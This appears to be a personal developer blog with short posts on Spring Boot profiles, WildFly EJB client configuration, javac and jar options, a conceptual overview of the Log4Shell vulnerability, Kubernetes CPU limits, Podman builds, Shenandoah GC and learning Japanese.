Spring boot multiple profiles

All

Development java web applications with spring is comes in handy considerably when developing production (and fast non production software). I mean, just adding an application.properties with the below can make it very simple to use several profiles, for each development (since Spring Boot 1.3):

spring.profiles.active=@activatedProperties@

And then setting on the mvn’s pom.xml the profiles:

<profiles>
		<profile>
			<id>local</id>
			<properties>
				<activatedProperties>local</activatedProperties>
			</properties>
			<activation>
				<activeByDefault>false</activeByDefault> <!-- here if false or true -->
                                <!-- <activeByDefault>true</activeByDefault> -->
			</activation>
		</profile>

And then you have a series of application-*.properties files, mandatorily pattern application-{custom_suffix}.properties, which is place on src/main/resources/application-*.properties, like src/main/resources/application-test.properties, where you will define the properties:

# AUTO-CONFIGURATION - set false for those which is not required
#spring.autoconfigure.exclude= # Auto-configuration classes to exclude.
spring.main.banner-mode=off
spring.jmx.enabled=false
...
server.jsp-servlet.registered=false
spring.freemarker.enabled=false

Interesting logging.config seems to be found in the server deployment, not in the application sources. We can use JAVA_OPTS=”$JAVA_OPTS -Dlogfile.name=test_file_name” to set a file name on runtime:

#appender.R.fileName = ${sys:logfile.name}
appender.R.fileName = ${filename}

reading about fusion energy

All

I’ve seen recently an amazing number of startups that aim to achieve production ready energy generation with fusion energy. It is very exciting, and the number of Canadian companies (or Canadian people behind it), very interesting and really exciting! Some of those have very short term goals, like Zap Energy

However, I’ve started to go deep on the understand of this (as much as possible, during holidays, with not such much technical books). There are several books and I’ve just started, but here is a short list.

I’ve started with a brand new book, The Fairy Tale of Nuclear Fusion (2021), by L.J. Reinders. Based from one of the comments on the video. Well, I’m still on chapter six and it is very well written, but very critical in regards to any timeline for this to be achieved. It is very critical and it seems an honest view, i.e. no assumptions were made and the writer indeed searched before coming to an conclusion, then wrote the book (not the other way around). But clearly the author has a very hard instance on the over-promises some scientists made with goals.

My interested started more because of the recent discoveries (public ones) and because of this video, by Sabine Hossenfelder. Later I’ve seen a couple comparing Tokamak VS Stellarator, VS Inertial confinement, ITER vs JET vs fusion. There is a lot of hard core (deep) information out there, one just need to look for it, and where to do it.

EJB with wildfly-services and wildfly-config

All

I think I’ve written here some topics about wildfly-config and EJB setting for client configuration. Let me go deep on this topic this time (these are the previous topics about it: here1 and here2).

Wildfly-config.xml will have its own syntax, but it is quite simple to understand, let see complete example. Basically everything must be in configuration, below authentication client, where we can defined the key stores, ssl contexts, and ssl context rules. Where the rules -> context -> key store. The default authentication rule is used and the defined at the bottom.

<?xml version="1.0" encoding="UTF-8"?>
...
<configuration>
  <authentication-client xmlns="urn:elytron:1.0">
      <!-- key stores-->
      <key-stores>
        <key-store name="qsKeyStore" type="JKS">
          <file name="server.keystore"/>
          <key-store-clear-password password="secret"/>
        </key-store>
      </key-stores>
      <!-- ssl context definition -->
      <ssl-contexts>
        <ssl-context name="aContext">
          <trust-store key-store-name="qsKeyStore"/>
          <cipher-suite selector="DEFAULT"/>
          <protocol names="TLSv1.2"/> <!-- tls v 1.2 -->
        </ssl-context>
      </ssl-contexts>
      <!-- usage -->
      <ssl-context-rules>
            <rule use-ssl-context="aContext"/>
      </ssl-context-rules>

        <!-- authentication rules use teh default configuration -->
        <authentication-rules>
                    <rule use-configuration="default" />
        </authentication-rules>
        <!-- Default configuration defined below \, and used above ^-->
        <authentication-configurations>
            <configuration name="default">
                <sasl-mechanism-selector selector="#ALL" />
                <set-mechanism-properties>
                    <property key="wildfly.sasl.local-user.quiet-auth" value="true" />
                 </set-mechanism-properties>
                <providers>
                    <use-service-loader/>
                </providers>
                <!-- Used for EJB over HTTP, remoting invocations will use transparent auth-->
                <set-user-name name="auser" />
                <credentials>
                    <clear-password password="apassword!" />
                </credentials>
             </configuration>
        </authentication-configurations>
    </authentication-client>
</configuration>

Now, in regards to using wildfly-config.xml, we can just do the following lookup for http and for https:

  <authentication-client xmlns="urn:elytron:1.0">
      <!-- key stores-->
      <key-stores>
        <key-store name="qsKeyStore" type="JKS">
          <file name="server.keystore"/>
          <key-store-clear-password password="secret"/>
        </key-store>
      </key-stores>
      <!-- ssl context definition -->
      <ssl-contexts>
        <ssl-context name="qsSSLContext">
          <trust-store key-store-name="qsKeyStore"/>
          <cipher-suite selector="DEFAULT"/>
          <protocol names="TLSv1.2"/>
        </ssl-context>
      </ssl-contexts>
      <!-- usage -->
      <ssl-context-rules>
            <rule use-ssl-context="qsSSLContext"/>
      </ssl-context-rules>

        <!-- authentication rules use teh default configuration -->
        <authentication-rules>
                    <rule use-configuration="default" />
        </authentication-rules>

And the initial context, for latest Wildfly, we can do as follows:

	//Get Initial Context
	public static Context getInitialContext() throws NamingException{
			Properties props = new Properties();
			props.put(Context.INITIAL_CONTEXT_FACTORY, "org.wildfly.naming.client.WildFlyInitialContextFactory");
			props.put(Context.PROVIDER_URL,"https://localhost:8443/wildfly-services");// <----  https:8443
			final Context context = new InitialContext(props);
			return context;
	}

So then we have, basically, http:8080/wildfly-services or https:8443/wildfly-services

Create jars and manifest files

All

Continuing my last posts. Let’s create a simple jar with the default content, using the -v option, for verbose (which will tell us exactly what is being added). Example:

jar cvf Example.jar * (or MyClass.class)

And compare with 0 option (which avoids compacting the files, and therefore will be heavier). In some tests Ive done here, the -0 can save considerable space sometimes, 30% in some cases).

jar -c0vf 

Now let’s set the main class with the `-e` option:

#using the v for verbose, f for file, -c for xx, and -e for setting the main file
jar -cvfe ClientJar.jar StandaloneClass Standalone.class

Now, let’s present we want to create a sealed jar, for instance when sending to the customer, to do so let’s add a customized manifest file, so we use the java -cvfm (m to use a custom manifest file), and create a manifest with the following content (with some other customizations):

manifest
sealed <---- set it to sealed

What is more interesting is that creating jars manually, makes me learn much more about the inner compilation of java classes, and the fact that inner classes generates a , like: StandaloneClient$innerclass.class, that is quite expected and obvious, but when creating the jar, so then we need to set jar -cvf *class, to not ended forgetting to add the inner class!

That’s the same if we implement the runnable and such, which makes a StandaloneClient$1.class <— which is de facto an anonymous inner class just because we implemented Runnable. If not, you will clearly face this (and wonder how come this happens):

NoClassDefFound: standaloneclient$1 <---- here

So must of the times, we don’t even bother creating/editing the Manifest file (since the IDE creates it and package it). But it is actually very useful and can come in hand in some scenarios.

Well, I guess that’s all the suggestions for today. Maybe next week I’ll do a blog post about o11y (observability), complementing my posts about java and k8s (and OCP).

Taking the world by storm: Log4Shell vulnerability CVE-2021-44228

All

Friday Nov 10th morning the news of Log4Shell vulnerability (CVE-2021-44228) started to appear, a few hours later several sites were already having their IPs shown in Github, examples were TSLA, twitter, Apple, Amazon, Twitter.

This vulnerability is very much related to one topic I usually post about it here, which is JNDI lookup, and LDAP in the context of EJB for returning Java Objects – aka serialization. And CVE 44228 is basically this, a JNDI lookup().

Updating your JDK for the latest will not save your from this one, but depending on the JDK it will much easier to get it. Explanation:

JDK versionsVulnerability
<8u121Starting with Java 8u121 remote codebase were no longer permitted by default for RMI (but not LDAP).
<=8u191There is a direct path from a controlled JNDI lookup to remote classloading of arbitrary code
8u191>RMI, References and object construction can still happen. Example: Apache Xbean BeanFactory

Solutions were already much much already described, basically updating the log4j or removing the JNDI lookup class. Since from log4j 2.15.0, this behavior has been disabled by default.

javac

All

Javac is this very well known tool will read the class files, .java, and create bytecode. Very useful and can be used with the following options. I think the -cp and -d are the most well known options. However, it has some many features we pretty much overlook that I think it is worth considering a second look (some examples from Nam Ha blog).

For instance, there is also the -verbose, example (from my favorite suite of java programs from Univ of Texas):

[fdemeloj@fdemeloj javac]$ javac -version FilterExample.java 
javac 1.7.0_171 <------------------------------------------------------ yes, javac is default for JDK 7, use alternatives to fix this
...
[fdemeloj@fdemeloj javac]$ javac -verbose First.java 
[parsing started RegularFileObject[First.java]]
[parsing completed 14ms]
[search path for source files: .]
[search path for class files: 
...pulse-java.jar,.]
../rt.jar/java/awt/Frame.class)]]
../rt.jar/java/awt/MenuContainer.class)]]
../rt.jar/java/lang/Object.class)]]
../rt.jar/java/awt/Window.class)]]
../rt.jar/javax/accessibility/Accessible.class)]]
../rt.jar/java/awt/Container.class)]]
...
[wrote RegularFileObject[First.class]]
[total 520ms]
[fdemeloj@fdemeloj javac]$ java First 

And given a certain directory (already there) you can use -d to set the compiled classes there: javac -d classes, so the .class files will be under /classes dir.

Interestingly -Xdiags:verbose (and compact) options does not seem to add much more on top of the verbose, in fact it adds 0 from when comparing to -verbose option, perhaps depending on the issue it shows more. I mean it helps a lot because it will show what is required vs what was found (see below – Driver class):

[fdemeloj@fdemeloj javac]$ $JAVA_HOME/bin/javac -verbose Driver01.java  <--------------------------------------- verbose
[parsing started SimpleFileObject[/home/fdemeloj/Downloads/cases/EJBtests/javac/Driver01.java]]
[parsing completed 29ms]
[loading /modules/java.xml.crypto/module-info.class] 
<<several others>>>
...
Driver01.java:41: error: incompatible types: possible lossy conversion from double to int
            swap(j, range, enterArray);
                 ^
[total 366ms]
Note: Some messages have been simplified; recompile with -Xdiags:verbose to get full output
1 error
[fdemeloj@fdemeloj javac]$ $JAVA_HOME/bin/javac -Xdiags:compact Driver01.java  <----------------------------------- compact
Driver01.java:41: error: incompatible types: possible lossy conversion from double to int
            swap(j, range, enterArray);
                 ^
Note: Some messages have been simplified; recompile with -Xdiags:verbose to get full output
1 error
[fdemeloj@fdemeloj javac]$ $JAVA_HOME/bin/javac -Xdiags:verbose Driver01.java <----------------------------------- verbose
Driver01.java:41: error: method swap in class Driver01 cannot be applied to given types;
            swap(j, range, enterArray);
            ^
  required: int,int,double[]
  found: double,int,double[]
  reason: argument mismatch; possible lossy conversion from double to int
1 error

And some extra options can be found with –help-extra:


[fdemeloj@fdemeloj javac]$ $JAVA_HOME/bin/javac --help-extra
  --add-exports <module>/<package>=<other-module>(,<other-module>)*
        Specify a package to be considered as exported from its defining module
        to additional modules, or to all unnamed modules if <other-module> is ALL-UNNAMED.
  --add-reads <module>=<other-module>(,<other-module>)*
        Specify additional modules to be considered as required by a given module.
        <other-module> may be ALL-UNNAMED to require the unnamed module.

One the most useful options is actually the Xlint (maybe because of my background in python and python lint process, pep-8 and so forth), I will ended doing a blog post about PMD, Checkstyle, and PetitDej as well:

[fdemeloj@fdemeloj javac]$ $JAVA_HOME/bin/javac -Xlint First.java 
First.java:3: warning: [serial] serializable class First has no definition of serialVersionUID <------ 
class First extends Frame{
^
1 warning

In JDK 11, interestingly it is possible to set –release flag not only sets source and target versions, but it also causes the compiler to use the symbol table for the JDK libraries corresponding to the specified release. This flag was added after and basically replace –source and –target.

Note: On JDK 11, I think I already mentioned this here that you can just run java, instead of javac, and the class will run:

java Hello.java
Hello, so much snow today in MTL!

I think one of the most useful, which makes javac almost like maven, is the ability to halt the compilation in case a warning happens with -Werror so it makes a default error when it seems a warning:

[fdemeloj@fdemeloj javac]$ $JAVA_HOME/bin/javac -Xdoclint:all -Werror First.java 
First.java:3: warning: no comment
class First extends Frame{
^
First.java:5: warning: no comment
First(){
^
First.java:15: warning: no comment
public static void main(String args[]){
                   ^
error: warnings found and -Werror specified
1 error <--------------------------------------------------------------------------- 1 error
3 warnings <------------------------------------------------------------------------ 3 warnings
[fdemeloj@fdemeloj javac]$ $JAVA_HOME/bin/javac -Xdoclint:all First.java 
First.java:3: warning: no comment
class First extends Frame{
^
First.java:5: warning: no comment
First(){
^
First.java:15: warning: no comment
public static void main(String args[]){
                   ^
3 warnings <--------------------------------------------------------------------------- 3 warnings

Learning Nihongo

All

I think that’s was, at the moment, the most difficult language I’ve studied – by a considerably margin.

Even using Quizlet and Ankiweb, and tutoring classes. The alphabets are not easy.

After 2x or 3x studying more Hiragana/Katagana than the entire time Ive studied the Cyrillic alphabet (solid 3x more), I started to memorize the actual letters. And then the verbs, wow.

The tip is to keep the pace and study everyday and don’t give up. After six months of study I did a considerable improvement in my pronunciation and understanding.

I can only be grateful for my sensei, Caio (email caiounb.jap@gmail.com) who helps me considerably this path. I would recommend the services of Mirai school, they have teacher that speak English as well.

After a few years(!) of pandemic, I cannot wait to board my plane to Tokyo and visit them

CFS, Milli cores and CPU metrics

All

Playing with OCP (with large projects) we see the important to set the adequate number resource memory to the application, java == jvm == planning for nominal and spike usage of memory. But less spoke, maybe in JVM but also very important is the cpu resources. Basically each container running on a node consumes compute resources, and setting/adding/increasing the number of threads is easy as long as we take in consideration the container limitations in terms of cpu. compute resources == resources (memory and cpu).

spec:
  containers:
  - name: app
    image: images.my-company.example/app:v4
    resources:
      requests:
        memory: "64Mi"
        cpu: "250m"
      limits:
        memory: "128Mi"
        cpu: "500m"

Planning your application/environment

It is about planning the application – if you know that your app will eat let’s say 2CPUs, then you add requests to 2000m milicores to the application == 2k millicores = 2 cores (1/5 of a core would be 200m and 1 core == 1k). Taking in consideration that requests = what application wants at start and normal run and limits is when you reach the threshold, the kernel will kill the process with OOM. ). Knowing that the application should not exceed more than 3CPUs, you will add limit = 3000m = 3k millicores = 3 cores. Planning for nominal usage but also for high spikes and corner (out-liners) utilization. In kubernetes 0.5 core == 500m == half core.

Requests does not mean necessarily usage

Setting requests = 2000m does not mean it will use those 2 CPUs. It can start with a lower amount, let’s say 500m and it will keep growing. Think requests are, what is the normal amount of resources that the application will use. Basically it to increase load on CPU and memory – you need to make sure you have enough resources to play around (on the limits and on the host as well).

Throttling

Well, in the case a container attempts to use more than the specified limit, the system will throttle the container – hold it off. Basically allowing your container to have a consistent level of service independent of the number of pods scheduled to the node. On the thread cpu image you see on the console you will see a plato /—-\ before a decrease. Basically the quota/period

Quotas vs Complete Fair Scheduler

Bringing back some knowledge from Dorsal Lab (listening Blonde) in Montreal and studying in the Linux kernel and preemption processes basically Kubernetes uses the so well known (Completely Fair Scheduler) CFS quota to enforce CPU limits on pod containers, and the quotas force the preemption exactly like the Linux Kernel 🙂 . This explains a lot how does the CPU Manager work with more details.

There are some recommendations to not set cpus limit for applications/pods that shouldn’t be throttled. But I would just set a very high limit 🙂

Podman | Thanks for the accesses

All

For all the posts I’ve created the last couples of weeks I’ve seen people accessing this blog from all over the world, from Norway, China, Singapore, Vietnam, Switzerland (yes, I’ve wrote this in one go and I got it right). So thanks for your access. With 3 years at Red Hat working with java, python, c++ and about 12y on this IT road (since 2009), as my Nihongo Sensei says the more I learn the more I realize I know. But I’m very glad to help all developers out there.

For today we will talk about build images with podman with a dockerfile

The dockerfile has this simple syntax, pretty much where, copy and run. The trick hat with the dockerfile is that it is very simple to use and it is at the same time very powerful:

Example of build with podman and dockerfile, some dockerfiles best practices can be found here

# syntax=docker/dockerfile:1
FROM node:12-alpine
RUN apk add --no-cache python3 g++ make
WORKDIR /app
COPY . .
RUN yarn install --production
CMD ["node", "src/index.js"]

Context directory

Interestingly although I’m using podman 1.6.4, I still need to set the context directory of the build, which shouldn’t be the case.

$ sudo podman build -t Dockerfile . <-------- don't forget the .
STEP 1: FROM registry.redhat.io/datagrid/datagrid-8-rhel8:1.2
Error: error creating build container: Error initializing source docker://registry.redhat.io/datagrid/datagrid-8-rhel8:1.2: unable to retrieve auth token: invalid username/password: unauthorized: Please login to the Red Hat Registry using your Customer Portal credentials. Further instructions can be found here: https://access.redhat.com/RegistryAuthentication

deep in Shenandoah GC

All

Going deep on my investigations on Shenandoah there is a world of things to learn. What is interesting is that the more you learn about a GC specifically, the more you learn form the others (as consequence of the associations and correlations your mind can make). Just like taking a book on Russian Rockets (like the N1) only and at some point you will understand much simpler, and faster Spacex’s Merlin/Raptor combustion rations and stuff. Anyways.

Reviewing the videos and the actual original paper Shenandoah’s paper Shenandoah an Open source concurrent compacting garbage collector for OpenJDK, it is very interesting that they solve the problem of accessing with basically two concepts: SATB (Snapshot at the beginning, which is also used in CMS and G1) and Forwarding pointer (which adds one more word to the two already there in OpenJDK).

One of those details that I’ve understand much better learning from Shenandoah was the importance of the compaction to avoid fragmentation, which actually happens to CMS (dep in JDK 11, and bye bye in JDK 17). Learning concurrent gc helps learn STW gc <– ofc, all of them are GCs at the end of the day.

Concurrent compaction is a very big part on Shenandoah algorithm as it is one of the three main concurrent phases (other three are respectively mark – given by the init mark|final mark STW – evaluation and updating references.

Roman Kennke has been a very good mentor, and setting up stones for me to learn considerably. But also the PhD Thesis from Paul Thomas, which introduce several concepts like STAB vs Incremental Updates, and Barriers, like write/read barriers and so on. Of course forwarding pointer and how it changed from Shenandoah1 vs Shenandoah2.